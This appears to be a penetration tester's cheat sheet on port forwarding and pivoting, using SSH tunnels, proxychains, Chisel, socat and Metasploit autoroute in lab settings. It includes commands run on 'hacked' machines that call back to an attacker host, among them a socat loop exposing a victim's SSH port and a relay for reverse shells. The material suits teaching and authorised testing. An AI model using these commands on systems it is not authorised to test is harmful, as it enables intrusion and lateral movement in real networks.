Port Forwarding

Port Forwarding and Pivoting

SSH

Locally

Example: we want to connect to the port 1025 on the remote machine "delivery" on our port 1337.

ssh -L 1337:localhost:1025 maildeliverer@delivery

Example: we want to access the port 1025 on the remote machine "pivotable" through the machine "delivery" on our machine on port 1337.

ssh -L 1337:pivotable:1025 maildeliverer@delivery

Remotely

Example: SSH to my kali, opens up port 1025 on the victim's localhost, to be accessible at port 1337 on kali.

ssh -R 1337:localhost:1025 kali@mykali

Dynamically

This creates a SOCKS proxy that allows you to reach IP addresses that are in the same network as a box you can SSH to.

Run the following commands on your machine to create a SOCKS proxy:

ssh -D 1080 username@box -N

Then, on your machine, make sure /etc/proxychains.conf has:

socks5 127.0.0.1 1080

Then you can use the proxychains command in front of your other commands to proxy through the machine. For example, this command curls the IP address 192.168.122.4 through the proxied machine:

proxychains4 curl 192.168.122.4

To use that with burp, go to "User Options", select "use socks proxy", and configure it to go through localhost on port 1080.

Note: SOCKS proxies proxy TCP traffic (and UDP with SOCKS5), but not ICMP, for example. So you can't ping through a proxy!

Note: Firefox and Chromium didn't seem to work with proxychains. It might be possible to specify a SOCKS proxy in the browser settings, though.

Two Hops

This section explains how to forward a reverse shell gained in a second hacked box through a first hacked box to kali.

Run the following commands on the first hacked machine:

# in an ssh session:
~C

# first part is for the hacked machine
# second part is for kali
-R 127.0.0.1:9001:127.0.0.1:9001 

Question: Why can't we just specify the private IP address in the above command instead of 127.0.0.1? In that case, we wouldn't have to redirect with socat later on.

You can confirm whether it worked by running:

netstat -alnp | grep 9001

This will send everything from the hacked machine's localhost:9001 to kali:9001. However, it will not send anything from the hacked machine's private IP address to kali.

You can use socat to redirect traffic from the second hacked machine's private IP address to its localhost, so that the traffic could be forwarded to kali.

In this example, the first hacked box's IP address is 192.168.122.1:

socat TCP-LISTEN:9001,bind=192.168.122.1,fork,reuseaddr TCP:localhost:9001 &

After you have set that up, you can run a reverse shell on the second hacked machine and have it connect to port 9001 on the first hacked machine. That connection will be forwarded to port 9001 on your kali. Don't forget to run a listener on port 9001 in kali to catch the connection.

Chisel

This will allow you to access port 4505 on the target's localhost from port 4505 on your own machine.

# Run on kali
./chisel_1.7.6_linux_amd64 server -p 12312 --reverse

# Run on target machine
./chisel_1.7.6_linux_amd64 client YOUR_IP_ADDRESS:12312 R:4505:127.0.0.1:4505

Socat

Same Machine Redirection

You can use socat for redirecting a port to another port on the same machine.

For example, this command redirects port 9001 on the IP address 192.168.122.1 to localhost:9001 on that same machine:

socat TCP-LISTEN:9001,bind=192.168.122.1,fork,reuseaddr TCP:localhost:9001 &

Access Remote Port Through Local Port

Tunneling and Port ForwardingHackTricks

Warning: For some strange reason, when I used this to forward a web port, then I was able to do curl requests to this, but not gobuster or wfuzz.

# On attacker's machine
# Redirect port 2222 to port 443 in localhost
sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr

# On victim machine
# Establish connection with the port 443 of the attacker and everything that comes from here is redirected to port 22
while true; do socat TCP4:ATTACKER_IP_ADDRESS_HERE:443 TCP4:127.0.0.1:22 ; done 

After following the above example, your port 2222 will be forwarded to a victim's port 22. So you can SSH to the victim like this:

ssh localhost -p 2222

Meterpreter Autorouting

Pivoting in MetasploitMetasploit Documentation Penetration Testing Software, Pen Testing Security

Autoroute documentation

Use autoroute to automatically route traffic to a specific host

Set up a socks proxy

use auxiliary/server/socks_proxy
run

Then set up proxychains by editing /etc/proxychains.conf. Add the socks5 proxy line under [ProxyList](if there is already a ProxyList, add the line under the existing ProxyList):

[ProxyList]
socks5 127.0.0.1 1080

In metasploit, set up autorouting

use multi/manage/autoroute
set cmd autoadd
set session SESSION_NUMBER_HERE # Has to be meterpreter I think
set subnet NETWORK_IP_ADDRESS_HERE
set netmask NETMASK_HERE
run

After that is done, you can run metasploit tools against the selected host. For example, scanner/portscan/tcp (the socks proxy part wasn't actually needed for this).

But you want to reach the host using non-metasploit tools, too. To run nmap and other tools against hosts in the chosen subnet, use proxychains. For example, let's say you chose the subnet 172.17.0.0, and you want to scan the host at 172.17.0.1:

proxychains -q nmap -A -v 172.17.0.1

Warning: I didn't actually get the proxychains part to work on the OpenSource HTB machine, unfortunately.

Meterpreter Port Forwarding

Portfwd is a command you can use for port forwarding on meterpreter

Pivoting in MetasploitMetasploit Documentation Penetration Testing Software, Pen Testing Security

Portfwd section of metasploit docs

From meterpreter shell:

portfwd add -l 3000 -p 3000 -r 172.0.0.1

• -l: local port to listen on

• -p: remote port to connect to

• -r: remote IP address to connect to

Pivoting Cheat Sheet

In-depth guide on different scenarios (ssh, reverse, tunnelling, etc):

https://artkond.com/2017/03/23/pivoting-guide/